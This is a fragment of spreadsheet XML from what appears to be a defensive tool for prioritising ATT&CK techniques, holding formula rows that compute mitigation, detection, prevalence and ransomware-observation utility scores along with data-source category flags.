      </c>
      <c r="G310" s="37">
        <v>0</v>
      </c>
      <c r="H310" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I310" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J310" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K310" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L310" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M310" s="37">
        <v>0</v>
      </c>
      <c r="N310" s="56">
        <v>0</v>
      </c>
      <c r="O310" s="56">
        <v>0</v>
      </c>
      <c r="P310" s="56">
        <v>0</v>
      </c>
      <c r="Q310" s="56">
        <v>1</v>
      </c>
      <c r="R310" s="57" t="s">
        <v>1084</v>
      </c>
      <c r="S310" s="57">
        <v>2</v>
      </c>
      <c r="T310" s="57" t="s">
        <v>610</v>
      </c>
      <c r="U310" s="57">
        <v>8</v>
      </c>
      <c r="V310" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.9999904761904762E-2</v>
      </c>
      <c r="W310" s="37">
        <v>10</v>
      </c>
      <c r="X310" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y310" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z310" s="37">
        <v>1</v>
      </c>
      <c r="AA310" s="37">
        <v>0.01</v>
      </c>
      <c r="AB310" s="37">
        <v>0.01</v>
      </c>
      <c r="AC310" s="37"/>
      <c r="AD310" s="50" t="s">
        <v>1081</v>
      </c>
      <c r="AE310" s="37" t="str" cm="1">
        <f t="array" ref="AE310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF310" s="37">
        <v>306</v>
      </c>
      <c r="AG310" s="37" t="str" cm="1">
        <f t="array" ref="AG310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD310)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH310" s="37">
        <v>306</v>
      </c>
      <c r="AI310" s="37" t="str" cm="1">
        <f t="array" ref="AI310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ310" s="37">
        <v>306</v>
      </c>
      <c r="AK310" s="37" t="str" cm="1">
        <f t="array" ref="AK310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL310" s="37">
        <v>306</v>
      </c>
      <c r="AM310" s="37" t="str" cm="1">
        <f t="array" ref="AM310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD310)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN310" s="37">
        <v>0</v>
      </c>
      <c r="AO310" s="37">
        <v>0</v>
      </c>
      <c r="AP310" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ310" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.249961111111112</v>
      </c>
      <c r="AR310" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS310" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT310" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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11" spans="1:47" ht="51">
      <c r="A311" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B311" s="37">
        <f t="shared" si="4"/>
        <v>219.46440276190475</v>
      </c>
      <c r="C311" s="37" t="s">
        <v>1087</v>
      </c>
      <c r="D311" s="50" t="s">
        <v>1088</v>
      </c>
      <c r="E311" s="37"/>
      <c r="F311" s="37">
        <v>1</v>
      </c>
      <c r="G311" s="37">
        <v>0</v>
      </c>
      <c r="H311" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I311" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J311" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K311" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L311" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M311" s="37">
        <v>0</v>
      </c>
      <c r="N311" s="56">
        <v>0</v>
      </c>
      <c r="O311" s="56">
        <v>1</v>
      </c>
      <c r="P311" s="56">
        <v>1</v>
      </c>
      <c r="Q311" s="56">
        <v>1</v>
      </c>
      <c r="R311" s="57" t="s">
        <v>1089</v>
      </c>
      <c r="S311" s="57">
        <v>3</v>
      </c>
      <c r="T311" s="57" t="s">
        <v>1090</v>
      </c>
      <c r="U311" s="57">
        <v>9</v>
      </c>
      <c r="V311" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1285715238095238</v>
      </c>
      <c r="W311" s="37">
        <v>12</v>
      </c>
      <c r="X311" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y311" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z311" s="37">
        <v>3</v>
      </c>
      <c r="AA311" s="37">
        <v>0.03</v>
      </c>
      <c r="AB311" s="37">
        <v>0.03</v>
      </c>
      <c r="AC311" s="37"/>
      <c r="AD311" s="50" t="s">
        <v>1091</v>
      </c>
      <c r="AE311" s="37" t="str" cm="1">
        <f t="array" ref="AE311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD311)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF311" s="37">
        <v>307</v>
      </c>
      <c r="AG311" s="37" t="str" cm="1">
        <f t="array" ref="AG311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD311)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH311" s="37">
        <v>307</v>
      </c>
      <c r="AI311" s="37" t="str" cm="1">
        <f t="array" ref="AI311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD311)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ311" s="37">
        <v>307</v>
      </c>
      <c r="AK311" s="37" t="str" cm="1">
        <f t="array" ref="AK311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD311)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL311" s="37">
        <v>307</v>
      </c>
      <c r="AM311" s="37" t="str" cm="1">
        <f t="array" ref="AM311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD311)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN311" s="37">
        <v>0</v>
      </c>
      <c r="AO311" s="37">
        <v>0</v>
      </c>
      <c r="AP311" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ311" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>73.154800920634912</v>
      </c>
      <c r="AR311" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS311" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT311" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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12" spans="1:47" ht="51">
      <c r="A312" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B312" s="37">
        <f t="shared" si="4"/>
        <v>208.43583171428574</v>
      </c>
      <c r="C312" s="37" t="s">
        <v>1092</v>
      </c>
      <c r="D312" s="50" t="s">
        <v>1088</v>
      </c>
      <c r="E312" s="37" t="s">
        <v>1093</v>
      </c>
      <c r="F312" s="37">
        <v>1</v>
      </c>
      <c r="G312" s="37">
        <v>0</v>
      </c>
      <c r="H312" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I312" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J312" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K312" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L312" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M312" s="37">
        <v>0</v>
      </c>
      <c r="N312" s="56">
        <v>0</v>
      </c>
      <c r="O312" s="56">
        <v>1</v>
      </c>
      <c r="P312" s="56">
        <v>0</v>
      </c>
      <c r="Q312" s="56">
        <v>0</v>
      </c>
      <c r="R312" s="57" t="s">
        <v>1089</v>
      </c>
      <c r="S312" s="57">
        <v>3</v>
      </c>
      <c r="T312" s="57" t="s">
        <v>1090</v>
      </c>
      <c r="U312" s="57">
        <v>9</v>
      </c>
      <c r="V312" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11904771428571428</v>
      </c>
      <c r="W312" s="37">
        <v>12</v>
      </c>
      <c r="X312" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y312" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z312" s="37">
        <v>1</v>
      </c>
      <c r="AA312" s="37">
        <v>0.01</v>
      </c>
      <c r="AB312" s="37">
        <v>0.01</v>
      </c>
      <c r="AC312" s="37"/>
      <c r="AD312" s="50" t="s">
        <v>1094</v>
      </c>
      <c r="AE312" s="37" t="str" cm="1">
        <f t="array" ref="AE312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF312" s="37">
        <v>308</v>
      </c>
      <c r="AG312" s="37" t="str" cm="1">
        <f t="array" ref="AG312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD312)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH312" s="37">
        <v>308</v>
      </c>
      <c r="AI312" s="37" t="str" cm="1">
        <f t="array" ref="AI312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ312" s="37">
        <v>308</v>
      </c>
      <c r="AK312" s="37" t="str" cm="1">
        <f t="array" ref="AK312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL312" s="37">
        <v>308</v>
      </c>
      <c r="AM312" s="37" t="str" cm="1">
        <f t="array" ref="AM312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD312)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN312" s="37">
        <v>0</v>
      </c>
      <c r="AO312" s="37">
        <v>0</v>
      </c>
      <c r="AP312" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ312" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>69.478610571428575</v>
      </c>
      <c r="AR312" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS312" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT312" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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13" spans="1:47" ht="51">
      <c r="A313" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B313" s="37">
        <f t="shared" si="4"/>
        <v>203.22154638095239</v>
      </c>
      <c r="C313" s="37" t="s">
        <v>1095</v>
      </c>
      <c r="D313" s="50" t="s">
        <v>1088</v>
      </c>
      <c r="E313" s="37" t="s">
        <v>1096</v>
      </c>
      <c r="F313" s="37">
        <v>1</v>
      </c>
      <c r="G313" s="37">
        <v>0</v>
      </c>
      <c r="H313" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I313" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J313" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K313" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L313" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M313" s="37">
        <v>0</v>
      </c>
      <c r="N313" s="56">
        <v>0</v>
      </c>
      <c r="O313" s="56">
        <v>0</v>
      </c>
      <c r="P313" s="56">
        <v>0</v>
      </c>
      <c r="Q313" s="56">
        <v>0</v>
      </c>
      <c r="R313" s="57" t="s">
        <v>1089</v>
      </c>
      <c r="S313" s="57">
        <v>3</v>
      </c>
      <c r="T313" s="57" t="s">
        <v>1090</v>
      </c>
      <c r="U313" s="57">
        <v>9</v>
      </c>
      <c r="V313" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428580952380953</v>
      </c>
      <c r="W313" s="37">
        <v>12</v>
      </c>
      <c r="X313" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y313" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z313" s="37">
        <v>0</v>
      </c>
      <c r="AA313" s="37">
        <v>0</v>
      </c>
      <c r="AB313" s="37">
        <v>0</v>
      </c>
      <c r="AC313" s="37"/>
      <c r="AD313" s="50" t="s">
        <v>1091</v>
      </c>
      <c r="AE313" s="37" t="str" cm="1">
        <f t="array" ref="AE313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD313)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF313" s="37">
        <v>309</v>
      </c>
      <c r="AG313" s="37" t="str" cm="1">
        <f t="array" ref="AG313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH313" s="37">
        <v>309</v>
      </c>
      <c r="AI313" s="37" t="str" cm="1">
        <f t="array" ref="AI313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ313" s="37">
        <v>309</v>
      </c>
      <c r="AK313" s="37" t="str" cm="1">
        <f t="array" ref="AK313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD313)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL313" s="37">
        <v>309</v>
      </c>
      <c r="AM313" s="37" t="str" cm="1">
        <f t="array" ref="AM313">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD313)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN313" s="37">
        <v>0</v>
      </c>
      <c r="AO313" s="37">
        <v>0</v>
      </c>
      <c r="AP313" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ313" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>67.740515460317468</v>
      </c>
      <c r="AR313" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS313" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT313" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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14" spans="1:47" ht="51">
      <c r="A314" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B314" s="37">
        <f t="shared" si="4"/>
        <v>203.87868961904763</v>
      </c>
      <c r="C314" s="37" t="s">
        <v>1097</v>
      </c>
      <c r="D314" s="50" t="s">
        <v>1088</v>
      </c>
      <c r="E314" s="37" t="s">
        <v>1098</v>
      </c>
      <c r="F314" s="37">
        <v>1</v>
      </c>
      <c r="G314" s="37">
        <v>0</v>
      </c>
      <c r="H314" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I314" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J314" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K314" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L314" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M314" s="37">
        <v>0</v>
      </c>
      <c r="N314" s="56">
        <v>0</v>
      </c>
      <c r="O314" s="56">
        <v>0</v>
      </c>
      <c r="P314" s="56">
        <v>0</v>
      </c>
      <c r="Q314" s="56">
        <v>0</v>
      </c>
      <c r="R314" s="57" t="s">
        <v>1089</v>
      </c>
      <c r="S314" s="57">
        <v>3</v>
      </c>
      <c r="T314" s="57" t="s">
        <v>1090</v>
      </c>
      <c r="U314" s="57">
        <v>9</v>
      </c>
      <c r="V314" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428580952380953</v>
      </c>
      <c r="W314" s="37">
        <v>12</v>
      </c>
      <c r="X314" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y314" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z314" s="37">
        <v>0</v>
      </c>
      <c r="AA314" s="37">
        <v>0</v>
      </c>
      <c r="AB314" s="37">
        <v>0</v>
      </c>
      <c r="AC314" s="37"/>
      <c r="AD314" s="50" t="s">
        <v>1091</v>
      </c>
      <c r="AE314" s="37" t="str" cm="1">
        <f t="array" ref="AE314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD314)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF314" s="37">
        <v>310</v>
      </c>
      <c r="AG314" s="37" t="str" cm="1">
        <f t="array" ref="AG314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH314" s="37">
        <v>310</v>
      </c>
      <c r="AI314" s="37" t="str" cm="1">
        <f t="array" ref="AI314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ314" s="37">
        <v>310</v>
      </c>
      <c r="AK314" s="37" t="str" cm="1">
        <f t="array" ref="AK314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD314)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL314" s="37">
        <v>310</v>
      </c>
      <c r="AM314" s="37" t="str" cm="1">
        <f t="array" ref="AM314">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD314)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN314" s="37">
        <v>0</v>
      </c>
      <c r="AO314" s="37">
        <v>0</v>
      </c>
      <c r="AP314" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ314" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>67.959563206349216</v>
      </c>
      <c r="AR314" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS314" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT314" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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15" spans="1:47" ht="51">
      <c r="A315" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B315" s="37">
        <f t="shared" si="4"/>
        <v>222.32154714285713</v>
      </c>
      <c r="C315" s="37" t="s">
        <v>1099</v>
      </c>
      <c r="D315" s="50" t="s">
        <v>1088</v>
      </c>
      <c r="E315" s="37" t="s">
        <v>1100</v>
      </c>
      <c r="F315" s="37">
        <v>1</v>
      </c>
      <c r="G315" s="37">
        <v>0</v>
      </c>
      <c r="H315" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I315" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J315" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K315" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L315" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M315" s="37">
        <v>0</v>
      </c>
      <c r="N315" s="56">
        <v>0</v>
      </c>
      <c r="O315" s="56">
        <v>3</v>
      </c>
      <c r="P315" s="56">
        <v>0</v>
      </c>
      <c r="Q315" s="56">
